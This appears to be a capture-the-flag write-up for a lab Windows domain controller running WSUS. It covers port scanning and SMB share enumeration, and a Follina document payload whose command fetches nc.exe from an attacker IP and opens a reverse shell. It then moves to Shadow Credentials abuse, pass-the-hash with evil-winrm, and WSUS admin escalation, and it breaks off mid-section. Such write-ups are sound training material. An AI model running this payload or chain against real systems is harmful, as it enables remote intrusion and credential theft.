$ nmap -p- --min-rate 5000 -Pn 10.129.193.194
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 13:54 EDT
Nmap scan report for 10.129.193.194
Host is up (0.012s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE
25/tcp open smtp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
8530/tcp open unknown
8531/tcp open unknown
9389/tcp open adws
49667/tcp open unknown
49689/tcp open unknown
49691/tcp open unknown
49693/tcp open unknown
49950/tcp open unknown
49961/tcp open unknown
59064/tcp open unknown
SMB Enumeration
Using guest credentials, we can find some shares:
$ smbmap -u 'guest' -p '' -H 10.129.193.194
[+] IP: 10.129.193.194:445 Name: 10.129.193.194
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Shares READ ONLY
SYSVOL NO ACCESS Logon server share
UpdateServicesPackages NO ACCESS A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent NO ACCESS A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp NO ACCESS A network share used by Local Publishing from a Remote WSUS Console Instance.
Also, we know that this is a WSUS machine. The Shares share has a single PDF:
$ smbclient //10.129.193.194/Shares -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jun 20 11:01:33 2022
.. D 0 Mon Jun 20 11:01:33 2022
NOC_Reminder.pdf AR 106977 Mon Jun 20 11:00:32 2022
When we view the PDF, it talks about how the systems are vulnerable to some CVEs, and that we have to send an email to itsupport@outdated.htb for it.
We have to sent a link to web applications, meaning someone will click on our links. We can start with researching the vulnerabilities listed in the PDF. The first CVE (also known as Follina) is an RCE vulnerability that makes use of a HTML file that the user has to click to execute arbitrary code.
This looks like the one that we need. I used this PoC below:
All we have to do is create a docs file that runs a command to give us a reverse shell:
$ python3 follina.py -t docx -m command -c "IWR http://10.10.14.13:8000/nc64.exe -outfile C:\\windows\\tasks\\nc.exe; C:\\windows\\tasks\\nc.exe -e cmd.exe 10.10.14.13 4444"
Generated 'clickme.docx' in current directory
Generated 'exploit.html' in 'www' directory
Serving payload on http://localhost:80/exploit.html
After waiting for a little bit, we should get a hit on both HTTP servers (one for exploit, one for
nc.exe) and get a reverse shell:
Privilege Escalation
We can't grab the user flag yet, so let's look around.
Shadow Credentials
We didn't have much privileges or access to files on the machine, so let's use Bloodhound to map the domain out and view the privileges that we have. In this case, we have to download SharpHound.exe onto the machine and get the files:
C:\Users\btables>.\SharpHound.exe
C:\Users\btables>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9EA0-5B4E
Directory of C:\Users\btables
05/11/2023 02:11 AM <DIR> .
05/11/2023 02:11 AM <DIR> ..
05/11/2023 02:11 AM 11,682 20230511021146_BloodHound.zip
Then we just need to transfer this file over to our machine via copy. Afterwards, start neo4j and bloodhound, then upload the data. We can find the privilege escalation vector here:
The AddKeyCredentialLink is exploitable using Shadow Credentials.
We have to download whisker.exe onto the machine. First, we can compile it in VS Code 2022 using a Windows machine. Then we can download this back to our Kali machine and put it on the machine.
Download and run Rubeus.exe with that command, and we should get a hash to use:
Using that NTLM hash, we can PTH and evil-winrm in.
Grab the user flag.
WSUS Admins
When we enumerate the groups we are in, we find that we are within the WSUS Admins group:
*Evil-WinRM* PS C:\Users\sflowers\desktop> net user sflowers
User name sflowers
Full Name Susan Flowers
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/20/2022 11:04:09 AM
Password expires Never
Password changeable 6/21/2022 11:04:09 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/11/2023 2:39:59 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use*WSUS Administrators
Global Group memberships *Domain Users
The command completed successfully.
For this, we can use SharpWSUS to enumerate and exploit anything:
Also, rather interestingly, we have PsExec64.exe within the user's desktop: